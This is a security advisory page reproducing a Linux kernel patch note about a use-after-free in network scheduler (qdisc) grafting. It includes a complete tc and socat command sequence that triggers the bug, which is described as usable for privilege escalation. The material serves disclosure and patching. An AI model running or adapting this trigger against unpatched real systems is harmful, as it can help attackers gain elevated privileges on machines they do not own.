Entreprise française de cybersécurité depuis 2004
☎ 03 60 47 09 81 - info@securiteinfo.com
☎ 03 60 47 09 81 - info@securiteinfo.com
In the Linux kernel, the following vulnerability has been resolved:net: sched: Disallow replacing of child qdisc from one parent to anotherLion Ackermann was able to create a UAF which can be abused for privilegeescalation with the following scriptStep 1. create root qdisctc qdisc add dev lo root handle 1:0 drrstep2. a class for packet aggregation do demonstrate uaftc class add dev lo classid 1:1 drrstep3. a class for nestingtc class add dev lo classid 1:2 drrstep4. a class to graft qdisc totc class add dev lo classid 1:3 drrstep5.tc qdisc add dev lo parent 1:1 handle 2:0 plug limit 1024step6.tc qdisc add dev lo parent 1:2 handle 3:0 drrstep7.tc class add dev lo classid 3:1 drrstep 8.tc qdisc add dev lo parent 3:1 handle 4:0 pfifostep 9. Display the class/qdisc layouttc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kbtc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 limit 1000p qdisc drr 3: dev lo parent 1:2step10. trigger the bug <=== prevented by this patchtc qdisc replace dev lo parent 1:3 handle 4:0step 11. Redisplay again the qdiscs/classestc class ls dev lo class drr 1:1 root leaf 2: quantum 64Kb class drr 1:2 root leaf 3: quantum 64Kb class drr 1:3 root leaf 4: quantum 64Kb class drr 3:1 root leaf 4: quantum 64Kbtc qdisc ls qdisc drr 1: dev lo root refcnt 2 qdisc plug 2: dev lo parent 1:1 qdisc pfifo 4: dev lo parent 3:1 refcnt 2 limit 1000p qdisc drr 3: dev lo parent 1:2Observe that a) parent for 4:0 does not change despite the replace request.There can only be one parent. b) refcount has gone up by two for 4:0 andc) both class 1:3 and 3:1 are pointing to it.Step 12. send one packet to plugecho "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10001))step13. send one packet to the grafted fifoecho "" | socat -u STDIN UDP4-DATAGRAM:127.0.0.1:8888,priority=$((0x10003))step14. lets trigger the uaftc class delete dev lo classid 1:3tc class delete dev lo classid 1:1The semantics of "replace" is for a del/add _on the same node_ and nota delete from one node(3:1) and add to another node (1:3) as in step10.While we could "fix" with a more complex approach there could beconsequences to expectations so the patch takes the preventive approach of"disallow such config".Joint work with Lion Ackermann
No PoCs from references.
- https://github.com/ARPSyndicate/cve-scores
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://github.com/w4zu/Debian_security
- https://github.com/xairy/linux-kernel-exploitation